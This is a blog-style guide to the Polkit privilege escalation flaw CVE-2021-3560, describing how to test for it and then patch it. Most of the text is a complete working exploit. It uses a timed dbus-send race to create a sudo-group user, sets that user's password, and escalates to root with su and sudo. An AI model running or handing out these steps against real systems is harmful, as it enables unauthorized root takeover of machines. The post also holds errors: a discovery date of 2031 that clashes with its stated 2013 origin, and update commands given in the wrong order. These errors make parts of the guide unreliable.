Step By Step Procedure To Fix The Plokit Vulnerability (CVE-2021-3560)

Another vulnerability found on the Polkit system could enable a local user to gain root privileges by bypassing authentication. It is very much required to test and fix the Plokit vulnerability (CVE-2021-3560). We tell try covering most of the information about this vulnerability, affected versions, affected OS platforms, and the fix. Let’s get started.

What Is Polkit?

Polkit is a small toolkit used for defining and handling authorizations on Unix/Linux platforms. It helps the unprivileged process to securely communicate with the privileged process. In essence, it stops unprivileged users from executing admin tasks. When a user tries to run a privileged task from $ prompt on Linux systems, the system will ask to enter a superuser password. That system is actually the Polkit service which is running under the line of control. It is installed by default on many Linux distributions. It’s used by the system, so any Linux distribution that uses systemd that also uses polkit.

About The Local Privilege Escalation Plokit Vulnerability (CVE-2021-3560):

The vulnerability on the Polkit service allows a local user to gain a root prompt on the system without passing the authentication. This is a serious vulnerability. However, the good news is that it needs local access to the machine to exploit this vulnerability. This flow is quite old. GitHub security researcher Kevin Backhouse said that issue was introduced in a code commit made on Nov. 09, 2013. It was made public by Redhat on Jun. 03, 2021, upon fixing the Plokit vulnerability (CVE-2021-3560). 

Update: A new 12 year old local privilege escalation vulnerability (CVE-2021-4034) is discovered again in Polkit’s pkexce command-line tool.

Summary of CVE-2021-3560:

Affected Polkit Versions To The Local Privilege Escalation Vulnerability (CVE-2021-3560):

This flow is as old as seven years. It was first discovered in Nov 2031 in its first release, version 0.113. On RedHat Systems, the flow exists from v0.113 to v0.118.

However, the flaw is affected on Debian distribution’s as well with different versions. Because Debian systems have their own version scheme. On Debian systems, the flaw exists on v0.105-26.

There are few Linux versions affected: We suggest you to visit these distributions pages and follow their guidelines to fix the Plokit vulnerability.

RedHat: https://access.redhat.com/security/cve/CVE-2021-3560

Fedora: https://bugzilla.redhat.com/show_bug.cgi?id=1967424

Debian: https://security-tracker.debian.org/tracker/CVE-2021-3560

Ubunut: https://ubuntu.com/security/CVE-2021-3560

How To Test The Privilege Escalation Plokit Vulnerability (CVE-2021-3560) On The Host?

How to test the privilege escalation Plokit vulnerability?

Step 1. Install accountsservice & gnome-control-center packages if you are using non GUI mode

$ sudo yum install accountsservice gnome-control-center

Step 2. Disable authentication dialog

$ ssh localhost

Step 3. Find out the time required to process a request

$ time dbus-send –system –dest=org.freedesktop.Accounts –type=method_call –print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:”Boris Ivanovich Grishenko” int32:1

Step 4. Initiate the dbus-send and kill the process at the middle of execution

$ dbus-send –system –dest=org.freedesktop.Accounts –type=method_call –print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:”Boris Ivanovich Grishenko” int32:1 & sleep 0.008s ; kill $!

Step 5. Run the command written in the step 4 for several times until you succeed

A user boris will be created if you succeed in the attack

Step 6. Generate the hash of the password using openssl tool

$ openssl passwd -5 ThesecMaster!#%&

Step 7. Use the same method to set the password to the user boris

$ dbus-send –system –dest=org.freedesktop.Accounts –type=method_call –print-reply /org/freedesktop/Accounts/User1002 org.freedesktop.Accounts.User.SetPassword string:’$5$eCOGHvV.IgdjUFAu$TxsytDdjA9n/O3/POCCXnzMVg51Z4Gv7lVRq17qOisD’ string:GoldenEye & sleep 0.008s ; kill $!

Step 8. Run the command written in the step 7 for several times until you succeed

Step 9. Become a root using su command

$ su – boris
$ sudo su

Before we fix the Plokit vulnerability, we can test it just to ensure the machine is vulnerable to the attack. Three tools and two packages are required to exploit the Plokit vulnerability. Three tools are bash, kill, and dbus-send. Two packages are ‘accountsservice’ and ‘gnome-control-center (installed by default). If you have all these prerequisites, then it’s not that difficult and lengthy process to exploit the vulnerability, but it may need a bit of good luck as it needs perfect timing to circumvent the authorization process. 

Note: accountsservice and gnome-control-center packages are needed to install if you are not running a graphical interface.

$ sudo yum install accountsservice gnome-control-center

Note: Authentication dialog will keep appearing each time you execute the command. Run the below command on an SSH session if you want to stop repeatedly triggering the authentication dialog box.

$ ssh localhost

The exploit process will start by triggering the ‘dbus-send’ command and killing it in the middle of processing the request. You should know the average time of execution to stop at the middle. Run this command for few times and capture the average time required to execute.

$ time dbus-send –system –dest=org.freedesktop.Accounts –type=method_call –print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:”Boris Ivanovich Grishenko” int32:1

After you note down the number of milliseconds your computer will take to execute the command, remote the ‘time’ at the beginning of the command and attach ‘& sleep 0.008s ; kill $!’ at the end. In this example, we are killing the ‘dbus-send’ process exactly at 8 milliseconds. You can set the time as per your system’s execution time.

$ dbus-send –system –dest=org.freedesktop.Accounts –type=method_call –print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:”Boris Ivanovich Grishenko” int32:1 & sleep 0.008s ; kill $!

Execute the command several times. Your system will create a new user named ‘boris’ after several attempts. Make sure the user-created from the below command.

$ id boris

User boris is a member of the sudo group. So you have achieved privilege escalation. Now, you need to set a password to the user boris. The D-Bus utility accepts only a hash value of your password. Calculate the hash of your password using OpenSSL tool.

$ openssl passwd -5 ThesecMaster!#%&

Output: $5$eCOGHvV.IgdjUFAu$TxsytDdjA9n/O3/POCCXnzMVg51Z4Gv7lVRq17qOisD

Use the same dbus-send command again, but this time use the SetPassword parameter.

$ dbus-send –system –dest=org.freedesktop.Accounts –type=method_call –print-reply /org/freedesktop/Accounts/User1002 org.freedesktop.Accounts.User.SetPassword string:’$5$eCOGHvV.IgdjUFAu$TxsytDdjA9n/O3/POCCXnzMVg51Z4Gv7lVRq17qOisD’ string:GoldenEye & sleep 0.008s ; kill $!

Bear in mind that you need to figure out the average time and set the process to kill exactly at the middle of the process.

Try for several attempts until you succeed in setting the password.

Now you can log in as boris and change it to root:

$ su – boris

$ sudo su

How To Fix The Local Privilege Escalation Plokit vulnerability (CVE-2021-3560) On The Host?

The procedure to fix the Plokit vulnerability is very simple. You can either download the fixed packages from the Linux distribution websites (Provided in the previous section) and upgrade the package alone. Or run the system update. The problem could be fixed after running the system update.

Use this command to update the Polkit package on Ubuntu:
$ sudo apt install <package name>

Use this command if you want to update the system:
$ sudo apt upgrade && sudo apt update

We recommend rebooting after the system update. That’s all. This completes the procedure to fix the Plokit vulnerability.

Thanks for reading this post. Please share the post and spread awareness about the security.